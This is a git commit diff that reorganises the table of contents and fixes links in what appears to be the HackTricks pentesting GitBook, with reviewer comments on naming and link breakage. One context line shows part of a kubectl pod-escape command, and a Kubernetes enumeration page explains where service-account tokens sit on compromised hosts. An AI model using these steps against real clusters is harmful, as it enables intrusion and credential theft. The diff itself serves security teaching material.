GitBook: [#3161] No subject

CPol 2022-05-01 15:53:26 +00:00 committed by gitbook-bot
parent edcb9a25c7
commit 070200605a
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
89 changed files with 298 additions and 305 deletions


@ -78,8 +78,8 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
You can find **my reviews of the certifications eMAPT and eWPTXv2** (and their **respective preparation courses**) in the following page: You can find **my reviews of the certifications eMAPT and eWPTXv2** (and their **respective preparation courses**) in the following page:
{% content-ref url="courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md" %} {% content-ref url="external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md" %}
[ine-courses-and-elearnsecurity-certifications-reviews.md](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md) [ine-courses-and-elearnsecurity-certifications-reviews.md](external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md)
{% endcontent-ref %} {% endcontent-ref %}
## License ## License


@ -25,6 +25,37 @@
* [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md) * [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md)
* [Detecting Phising](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md) * [Detecting Phising](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md)
* [Phishing Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md) * [Phishing Documents](generic-methodologies-and-resources/phishing-methodology/phishing-documents.md)
* [Basic Forensic Methodology](generic-methodologies-and-resources/basic-forensic-methodology/README.md)
* [Baseline Monitoring](generic-methodologies-and-resources/basic-forensic-methodology/file-integrity-monitoring.md)
* [Anti-Forensic Techniques](generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md)
* [Docker Forensics](generic-methodologies-and-resources/basic-forensic-methodology/docker-forensics.md)
* [Image Adquisition & Mount](generic-methodologies-and-resources/basic-forensic-methodology/image-adquisition-and-mount.md)
* [Linux Forensics](generic-methodologies-and-resources/basic-forensic-methodology/linux-forensics.md)
* [Malware Analysis](generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md)
* [Memory dump analysis](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/README.md)
* [Volatility - CheatSheet](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md)
* [Partitions/File Systems/Carving](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md)
* [EXT](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ext.md)
* [File/Data Carving & Recovery Tools](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
* [NTFS](generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md)
* [Pcap Inspection](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md)
* [DNSCat pcap analysis](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md)
* [USB Keystrokes](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md)
* [Wifi Pcap Analysis](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md)
* [Wireshark tricks](generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md)
* [Specific Software/File-Type Tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/README.md)
* [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
* [Browser Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md)
* [Desofuscation vbs (cscript.exe)](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md)
* [Local Cloud Storage](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md)
* [Office file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md)
* [PDF File analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md)
* [PNG tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md)
* [Video and Audio file analysis](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md)
* [ZIPs tricks](generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md)
* [Windows Artifacts](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/README.md)
* [Windows Processes](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/windows-processes.md)
* [Interesting Windows Registry Keys](generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md)
* [Brute Force - CheatSheet](generic-methodologies-and-resources/brute-force.md) * [Brute Force - CheatSheet](generic-methodologies-and-resources/brute-force.md)
* [Exfiltration](generic-methodologies-and-resources/exfiltration.md) * [Exfiltration](generic-methodologies-and-resources/exfiltration.md)
* [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md) * [Tunneling and Port Forwarding](generic-methodologies-and-resources/tunneling-and-port-forwarding.md)
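Review bot: the relocated forensic entries carry over the misspelled titles "Image Adquisition & Mount", "Retreive from .pyc" and "Desofuscation vbs" (next to the unchanged neighbour "Detecting Phising"); since every link in this block is being rewritten anyway, this is the cheap moment to fix the visible titles (the file slugs can stay unless the files are renamed as well). The same 31 entries are removed from forensics/ further down this SUMMARY, so any relative link inside those pages that reaches outside the folder (../ references) changes meaning after the move; this excerpt only shows such link fixes for two Kubernetes pages, so confirm the forensic pages were checked too.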
@ -367,7 +398,7 @@
* [47808/udp - Pentesting BACNet](network-services-pentesting/47808-udp-bacnet.md) * [47808/udp - Pentesting BACNet](network-services-pentesting/47808-udp-bacnet.md)
* [50030,50060,50070,50075,50090 - Pentesting Hadoop](network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md) * [50030,50060,50070,50075,50090 - Pentesting Hadoop](network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md)
*** ## 🕸 Pentesting Web
* [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md) * [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md)
* [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md) * [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md)
@ -389,7 +420,7 @@
* [CRLF (%0D%0A) Injection](pentesting-web/crlf-0d-0a.md) * [CRLF (%0D%0A) Injection](pentesting-web/crlf-0d-0a.md)
* [Cross-site WebSocket hijacking (CSWSH)](pentesting-web/cross-site-websocket-hijacking-cswsh.md) * [Cross-site WebSocket hijacking (CSWSH)](pentesting-web/cross-site-websocket-hijacking-cswsh.md)
* [CSRF (Cross Site Request Forgery)](pentesting-web/csrf-cross-site-request-forgery.md) * [CSRF (Cross Site Request Forgery)](pentesting-web/csrf-cross-site-request-forgery.md)
* [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection.md) * [Dangling Markup - HTML scriptless injection](pentesting-web/dangling-markup-html-scriptless-injection/README.md)
* [HTML Injection / Char-by-char Exfiltration](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md) * [HTML Injection / Char-by-char Exfiltration](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/README.md)
* [CSS Injection Code](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/css-injection-code.md) * [CSS Injection Code](pentesting-web/dangling-markup-html-scriptless-injection/html-injection-char-by-char-exfiltration/css-injection-code.md)
* [Deserialization](pentesting-web/deserialization/README.md) * [Deserialization](pentesting-web/deserialization/README.md)
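Review bot: the parent entry now points at pentesting-web/dangling-markup-html-scriptless-injection/README.md while its two children ("HTML Injection / Char-by-char Exfiltration" and "CSS Injection Code") already lived in that folder on both sides of the diff, so this fixes a parent-as-file, children-in-folder mismatch; make sure the old standalone file pentesting-web/dangling-markup-html-scriptless-injection.md is moved to README.md in this commit rather than left behind as an orphan with the same content.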
@ -423,10 +454,10 @@
* [hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md) * [hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md)
* [IDOR](pentesting-web/idor.md) * [IDOR](pentesting-web/idor.md)
* [JWT Vulnerabilities (Json Web Tokens)](pentesting-web/hacking-jwt-json-web-tokens.md) * [JWT Vulnerabilities (Json Web Tokens)](pentesting-web/hacking-jwt-json-web-tokens.md)
* [NoSQL injection](pentesting-web/nosql-injection.md)
* [LDAP Injection](pentesting-web/ldap-injection.md) * [LDAP Injection](pentesting-web/ldap-injection.md)
* [Login Bypass](pentesting-web/login-bypass/README.md) * [Login Bypass](pentesting-web/login-bypass/README.md)
* [Login bypass List](pentesting-web/login-bypass/sql-login-bypass.md) * [Login bypass List](pentesting-web/login-bypass/sql-login-bypass.md)
* [NoSQL injection](pentesting-web/nosql-injection.md)
* [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md) * [OAuth to Account takeover](pentesting-web/oauth-to-account-takeover.md)
* [Open Redirect](pentesting-web/open-redirect.md) * [Open Redirect](pentesting-web/open-redirect.md)
* [Parameter Pollution](pentesting-web/parameter-pollution.md) * [Parameter Pollution](pentesting-web/parameter-pollution.md)
@ -475,37 +506,10 @@
* [Steal Info JS](pentesting-web/xss-cross-site-scripting/steal-info-js.md) * [Steal Info JS](pentesting-web/xss-cross-site-scripting/steal-info-js.md)
* [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md) * [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
* [XS-Search](pentesting-web/xs-search.md) * [XS-Search](pentesting-web/xs-search.md)
* [Basic Forensic Methodology](forensics/basic-forensic-methodology/README.md)
* [Baseline Monitoring](forensics/basic-forensic-methodology/file-integrity-monitoring.md) ## ⛈ Cloud Security
* [Anti-Forensic Techniques](forensics/basic-forensic-methodology/anti-forensic-techniques.md)
* [Docker Forensics](forensics/basic-forensic-methodology/docker-forensics.md) * [Cloud Security](cloud-security/cloud-security.md)
* [Image Adquisition & Mount](forensics/basic-forensic-methodology/image-adquisition-and-mount.md)
* [Linux Forensics](forensics/basic-forensic-methodology/linux-forensics.md)
* [Malware Analysis](forensics/basic-forensic-methodology/malware-analysis.md)
* [Memory dump analysis](forensics/basic-forensic-methodology/memory-dump-analysis/README.md)
* [Volatility - CheatSheet](forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md)
* [Partitions/File Systems/Carving](forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md)
* [EXT](forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md)
* [File/Data Carving & Recovery Tools](forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md)
* [NTFS](forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md)
* [Pcap Inspection](forensics/basic-forensic-methodology/pcap-inspection/README.md)
* [DNSCat pcap analysis](forensics/basic-forensic-methodology/pcap-inspection/dnscat-exfiltration.md)
* [USB Keystrokes](forensics/basic-forensic-methodology/pcap-inspection/usb-keystrokes.md)
* [Wifi Pcap Analysis](forensics/basic-forensic-methodology/pcap-inspection/wifi-pcap-analysis.md)
* [Wireshark tricks](forensics/basic-forensic-methodology/pcap-inspection/wireshark-tricks.md)
* [Specific Software/File-Type Tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/README.md)
* [Decompile compiled python binaries (exe, elf) - Retreive from .pyc](forensics/basic-forensic-methodology/specific-software-file-type-tricks/.pyc.md)
* [Browser Artifacts](forensics/basic-forensic-methodology/specific-software-file-type-tricks/browser-artifacts.md)
* [Desofuscation vbs (cscript.exe)](forensics/basic-forensic-methodology/specific-software-file-type-tricks/desofuscation-vbs-cscript.exe.md)
* [Local Cloud Storage](forensics/basic-forensic-methodology/specific-software-file-type-tricks/local-cloud-storage.md)
* [Office file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/office-file-analysis.md)
* [PDF File analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/pdf-file-analysis.md)
* [PNG tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md)
* [Video and Audio file analysis](forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md)
* [ZIPs tricks](forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md)
* [Windows Artifacts](forensics/basic-forensic-methodology/windows-forensics/README.md)
* [Windows Processes](forensics/basic-forensic-methodology/windows-forensics/windows-processes.md)
* [Interesting Windows Registry Keys](forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md)
* [GCP Security](cloud-security/gcp-security/README.md) * [GCP Security](cloud-security/gcp-security/README.md)
* [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md) * [GCP - Other Services Enumeration](cloud-security/gcp-security/gcp-looting.md)
* [GCP - Abuse GCP Permissions](cloud-security/gcp-security/gcp-interesting-permissions/README.md) * [GCP - Abuse GCP Permissions](cloud-security/gcp-security/gcp-interesting-permissions/README.md)
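Review bot: the new "⛈ Cloud Security" group opens with an entry for cloud-security/cloud-security.md, which this commit adds as a two-line file holding only the heading "# Cloud Security" (the `@ -0,0 +1,2 @@` hunk further down), so clicking the group lands readers on an empty page. Either give that page a short index of what follows (GCP, Github, Gitea, Kubernetes, Concourse, Atlantis, Cloud Security Review, AWS) or drop the entry so "GCP Security" is the first page. The removal of the forensics/ block here is the counterpart of the insert under generic-methodologies-and-resources/ above and matches it entry for entry.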
@ -525,22 +529,22 @@
* [Basic Github Information](cloud-security/github-security/basic-github-information.md) * [Basic Github Information](cloud-security/github-security/basic-github-information.md)
* [Gitea Security](cloud-security/gitea-security/README.md) * [Gitea Security](cloud-security/gitea-security/README.md)
* [Basic Gitea Information](cloud-security/gitea-security/basic-gitea-information.md) * [Basic Gitea Information](cloud-security/gitea-security/basic-gitea-information.md)
* [Kubernetes Security](pentesting/pentesting-kubernetes/README.md) * [Kubernetes Security](cloud-security/pentesting-kubernetes/README.md)
* [Kubernetes Basics](pentesting/pentesting-kubernetes/kubernetes-basics.md) * [Kubernetes Basics](cloud-security/pentesting-kubernetes/kubernetes-basics.md)
* [Pentesting Kubernetes Services](pentesting/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md) * [Pentesting Kubernetes Services](cloud-security/pentesting-kubernetes/pentesting-kubernetes-from-the-outside.md)
* [Exposing Services in Kubernetes](pentesting/pentesting-kubernetes/exposing-services-in-kubernetes.md) * [Exposing Services in Kubernetes](cloud-security/pentesting-kubernetes/exposing-services-in-kubernetes.md)
* [Attacking Kubernetes from inside a Pod](pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) * [Attacking Kubernetes from inside a Pod](cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md)
* [Kubernetes Enumeration](cloud-security/pentesting-kubernetes/kubernetes-enumeration.md) * [Kubernetes Enumeration](cloud-security/pentesting-kubernetes/kubernetes-enumeration.md)
* [Kubernetes Role-Based Access Control (RBAC)](pentesting/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md) * [Kubernetes Role-Based Access Control (RBAC)](cloud-security/pentesting-kubernetes/kubernetes-role-based-access-control-rbac.md)
* [Abusing Roles/ClusterRoles in Kubernetes](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md) * [Abusing Roles/ClusterRoles in Kubernetes](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md)
* [K8s Roles Abuse Lab](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md) * [K8s Roles Abuse Lab](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/k8s-roles-abuse-lab.md)
* [Pod Escape Privileges](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md) * [Pod Escape Privileges](cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md)
* [Kubernetes Namespace Escalation](cloud-security/pentesting-kubernetes/namespace-escalation.md) * [Kubernetes Namespace Escalation](cloud-security/pentesting-kubernetes/namespace-escalation.md)
* [Kubernetes Access to other Clouds](cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md) * [Kubernetes Access to other Clouds](cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md)
* [Kubernetes Hardening](pentesting/pentesting-kubernetes/kubernetes-hardening/README.md) * [Kubernetes Hardening](cloud-security/pentesting-kubernetes/kubernetes-hardening/README.md)
* [Monitoring with Falco](pentesting/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md) * [Monitoring with Falco](cloud-security/pentesting-kubernetes/kubernetes-hardening/monitoring-with-falco.md)
* [Kubernetes SecurityContext(s)](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md) * [Kubernetes SecurityContext(s)](cloud-security/pentesting-kubernetes/kubernetes-hardening/kubernetes-securitycontext-s.md)
* [Kubernetes NetworkPolicies](pentesting/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md) * [Kubernetes NetworkPolicies](cloud-security/pentesting-kubernetes/kubernetes-hardening/kubernetes-networkpolicies.md)
* [Kubernetes Network Attacks](cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md) * [Kubernetes Network Attacks](cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md)
* [Concourse](cloud-security/concourse/README.md) * [Concourse](cloud-security/concourse/README.md)
* [Concourse Architecture](cloud-security/concourse/concourse-architecture.md) * [Concourse Architecture](cloud-security/concourse/concourse-architecture.md)
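Review bot: this hunk only rewrites the prefix pentesting/pentesting-kubernetes/ to cloud-security/pentesting-kubernetes/, and several entries (Kubernetes Enumeration, Abusing Roles/ClusterRoles with its two children, Namespace Escalation, Access to other Clouds, Network Attacks) already used cloud-security/ on the old side, so the tree was split across two directories before this and the hunk ends that. The link fixes shown later in this diff are in two pages that were already under cloud-security/ (pod-escape-privileges and kubernetes-enumeration) and pointed into the old location; the ten pages that actually move (Kubernetes Security, Kubernetes Basics, Pentesting Kubernetes Services, Exposing Services, Attacking Kubernetes from inside a Pod, RBAC, Kubernetes Hardening and its three children) are not shown here, so verify both their own outgoing ../ links and any remaining references to pentesting/pentesting-kubernetes/ elsewhere in the book, or those links 404 after the move.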
@ -554,43 +558,56 @@
* [Atlantis](cloud-security/atlantis.md) * [Atlantis](cloud-security/atlantis.md)
* [Cloud Security Review](cloud-security/cloud-security-review.md) * [Cloud Security Review](cloud-security/cloud-security-review.md)
* [AWS Security](cloud-security/aws-security.md) * [AWS Security](cloud-security/aws-security.md)
* [BRA.I.NSMASHER Presentation](a.i.-exploiting/bra.i.nsmasher-presentation/README.md)
* [Basic Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/basic-bruteforcer.md) ## 😎 Hardware/Physical Access
* [Basic Captcha Breaker](a.i.-exploiting/bra.i.nsmasher-presentation/basic-captcha-breaker.md)
* [BIM Bruteforcer](a.i.-exploiting/bra.i.nsmasher-presentation/bim-bruteforcer.md) * [Physical Attacks](hardware-physical-access/physical-attacks.md)
* [Hybrid Malware Classifier Part 1](a.i.-exploiting/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md) * [Escaping from KIOSKs](hardware-physical-access/escaping-from-gui-applications/README.md)
* [ML Basics](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/README.md) * [Show file extensions](hardware-physical-access/escaping-from-gui-applications/show-file-extensions.md)
* [Feature Engineering](a.i.-exploiting/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md) * [Firmware Analysis](hardware-physical-access/firmware-analysis/README.md)
* [Bootloader testing](hardware-physical-access/firmware-analysis/bootloader-testing.md)
* [Firmware Integrity](hardware-physical-access/firmware-analysis/firmware-integrity.md)
## 🧐 External Platforms Reviews/Writeups
* [BRA.I.NSMASHER Presentation](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/README.md)
* [Basic Bruteforcer](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-bruteforcer.md)
* [Basic Captcha Breaker](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/basic-captcha-breaker.md)
* [BIM Bruteforcer](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/bim-bruteforcer.md)
* [Hybrid Malware Classifier Part 1](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/hybrid-malware-classifier-part-1.md)
* [ML Basics](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/README.md)
* [Feature Engineering](external-platforms-reviews-writeups/bra.i.nsmasher-presentation/ml-basics/feature-engineering.md)
* [INE Courses and eLearnSecurity Certifications Reviews](external-platforms-reviews-writeups/ine-courses-and-elearnsecurity-certifications-reviews.md)
## Group 1
* [Reversing & Exploiting](group-1/reversing-and-exploiting.md)
* [Reversing Tools & Basic Methods](group-1/reversing-tools-basic-methods/README.md)
* [Angr](group-1/reversing-tools-basic-methods/angr/README.md)
* [Angr - Examples](group-1/reversing-tools-basic-methods/angr/angr-examples.md)
* [Z3 - Satisfiability Modulo Theories (SMT)](group-1/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md)
* [Cheat Engine](group-1/reversing-tools-basic-methods/cheat-engine.md)
* [Blobrunner](group-1/reversing-tools-basic-methods/blobrunner.md)
* [Common API used in Malware](group-1/common-api-used-in-malware.md)
* [Linux Exploiting (Basic) (SPA)](group-1/linux-exploiting-basic-esp/README.md)
* [Format Strings Template](group-1/linux-exploiting-basic-esp/format-strings-template.md)
* [ROP - call sys\_execve](group-1/linux-exploiting-basic-esp/rop-syscall-execv.md)
* [ROP - Leaking LIBC address](group-1/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md)
* [ROP - Leaking LIBC template](group-1/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md)
* [Bypassing Canary & PIE](group-1/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
* [Ret2Lib](group-1/linux-exploiting-basic-esp/ret2lib.md)
* [Fusion](group-1/linux-exploiting-basic-esp/fusion.md)
* [Exploiting Tools](group-1/tools/README.md)
* [PwnTools](group-1/tools/pwntools.md)
* [Windows Exploiting (Basic Guide - OSCP lvl)](group-1/windows-exploiting-basic-guide-oscp-lvl.md)
***
* [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies/README.md) * [Blockchain & Crypto Currencies](blockchain/blockchain-and-crypto-currencies/README.md)
* [Page 1](blockchain/blockchain-and-crypto-currencies/page-1.md) * [Page 1](blockchain/blockchain-and-crypto-currencies/page-1.md)
* [INE Courses and eLearnSecurity Certifications Reviews](courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md)
* [Physical Attacks](physical-attacks/physical-attacks.md)
* [Escaping from KIOSKs](physical-attacks/escaping-from-gui-applications/README.md)
* [Show file extensions](physical-attacks/escaping-from-gui-applications/show-file-extensions.md)
* [Firmware Analysis](physical-attacks/firmware-analysis/README.md)
* [Bootloader testing](physical-attacks/firmware-analysis/bootloader-testing.md)
* [Firmware Integrity](physical-attacks/firmware-analysis/firmware-integrity.md)
* [Reversing Tools & Basic Methods](reversing/reversing-tools-basic-methods/README.md)
* [Angr](reversing/reversing-tools-basic-methods/angr/README.md)
* [Angr - Examples](reversing/reversing-tools-basic-methods/angr/angr-examples.md)
* [Z3 - Satisfiability Modulo Theories (SMT)](reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md)
* [Cheat Engine](reversing/reversing-tools-basic-methods/cheat-engine.md)
* [Blobrunner](reversing/reversing-tools-basic-methods/blobrunner.md)
* [Common API used in Malware](reversing/common-api-used-in-malware.md)
* [Cryptographic/Compression Algorithms](reversing/cryptographic-algorithms/README.md) * [Cryptographic/Compression Algorithms](reversing/cryptographic-algorithms/README.md)
* [Unpacking binaries](reversing/cryptographic-algorithms/unpacking-binaries.md) * [Unpacking binaries](reversing/cryptographic-algorithms/unpacking-binaries.md)
* [Word Macros](reversing/word-macros.md) * [Word Macros](reversing/word-macros.md)
* [Linux Exploiting (Basic) (SPA)](exploiting/linux-exploiting-basic-esp/README.md)
* [Format Strings Template](exploiting/linux-exploiting-basic-esp/format-strings-template.md)
* [ROP - call sys\_execve](exploiting/linux-exploiting-basic-esp/rop-syscall-execv.md)
* [ROP - Leaking LIBC address](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md)
* [ROP - Leaking LIBC template](exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/rop-leaking-libc-template.md)
* [Bypassing Canary & PIE](exploiting/linux-exploiting-basic-esp/bypassing-canary-and-pie.md)
* [Ret2Lib](exploiting/linux-exploiting-basic-esp/ret2lib.md)
* [Fusion](exploiting/linux-exploiting-basic-esp/fusion.md)
* [Exploiting Tools](exploiting/tools/README.md)
* [PwnTools](exploiting/tools/pwntools.md)
* [Windows Exploiting (Basic Guide - OSCP lvl)](exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
* [Certificates](cryptography/certificates.md) * [Certificates](cryptography/certificates.md)
* [Cipher Block Chaining CBC-MAC](cryptography/cipher-block-chaining-cbc-mac-priv.md) * [Cipher Block Chaining CBC-MAC](cryptography/cipher-block-chaining-cbc-mac-priv.md)
* [Crypto CTFs Tricks](cryptography/crypto-ctfs-tricks.md) * [Crypto CTFs Tricks](cryptography/crypto-ctfs-tricks.md)
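Review bot: "## Group 1" is a placeholder name and it ships to readers both as a sidebar heading and as the group-1/ segment of every URL beneath it; name it for what it holds, e.g. "Reversing & Exploiting", which is already the title of its first page (group-1/reversing-and-exploiting.md), before this lands, because renaming the directory later means another mass path rewrite like this commit. The split is also half done: Reversing Tools & Basic Methods, Common API used in Malware and the whole exploiting/ tree move into group-1/, but Cryptographic/Compression Algorithms, Unpacking binaries and Word Macros stay under reversing/, and Blockchain is left under a bare *** separator between two named groups; either move those too or keep the reversing/ tree intact so related pages share one directory.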


@ -0,0 +1,2 @@
# Cloud Security


@ -163,8 +163,8 @@ kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hos
Now that you can escape to the node check post-exploitation techniques in: Now that you can escape to the node check post-exploitation techniques in:
{% content-ref url="../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %} {% content-ref url="../attacking-kubernetes-from-inside-a-pod.md" %}
[attacking-kubernetes-from-inside-a-pod.md](../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) [attacking-kubernetes-from-inside-a-pod.md](../attacking-kubernetes-from-inside-a-pod.md)
{% endcontent-ref %} {% endcontent-ref %}
#### Stealth #### Stealth


@ -1,4 +1,4 @@
# Kubernetes Enumeration
<details> <details>
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
## Kubernetes Tokens
# Kubernetes Tokens
If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the **env var `KUBECONFIG`** or **inside `~/.kube`**. If you have compromised access to a machine the user may have access to some Kubernetes platform. The token is usually located in a file pointed by the **env var `KUBECONFIG`** or **inside `~/.kube`**.
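Review bot: the heading changes in this file are a one-level demotion everywhere else ("# RBAC" to "## RBAC", "## Hot Pods" to "### Hot Pods"), but this hunk shows "## Kubernetes Tokens" on one side and "# Kubernetes Tokens" on the other while shrinking by a line (-16,8 +16,7), so it is not clear which level survives; the page should end up with a single top-level "# Kubernetes Enumeration" and "## Kubernetes Tokens" at the same level as "## RBAC" and "## Enumeration CheatSheet" below, otherwise the GitBook outline nests "Kubernetes Tokens" and "Service Account Tokens" at the wrong depth.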
@ -25,9 +24,9 @@ In this folder you might find config files with **tokens and configurations to c
If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8 env: If you have compromised a pod inside a kubernetes environment, there are other places where you can find tokens and information about the current K8 env:
## Service Account Tokens ### Service Account Tokens
Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](../../pentesting/pentesting-kubernetes/#architecture)**.** Before continuing, if you don't know what is a service in Kubernetes I would suggest you to [**follow this link and read at least the information about Kubernetes architecture**](./#architecture)**.**
Taken from the Kubernetes [documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server): Taken from the Kubernetes [documentation](https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/#use-the-default-service-account-to-access-the-api-server):
@ -60,15 +59,15 @@ Default location on **Minikube**:
* /var/lib/localkube/certs * /var/lib/localkube/certs
## Hot Pods ### Hot Pods
_**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc. _**Hot pods are**_ pods containing a privileged service account token. A privileged service account token is a token that has permission to do privileged tasks such as listing secrets, creating pods, etc.
# RBAC ## RBAC
If you don't know what is **RBAC**, [**read this section**](../../pentesting/pentesting-kubernetes/#cluster-hardening-rbac). If you don't know what is **RBAC**, [**read this section**](./#cluster-hardening-rbac).
# Enumeration CheatSheet ## Enumeration CheatSheet
In order to enumerate a K8s environment you need a couple of this: In order to enumerate a K8s environment you need a couple of this:
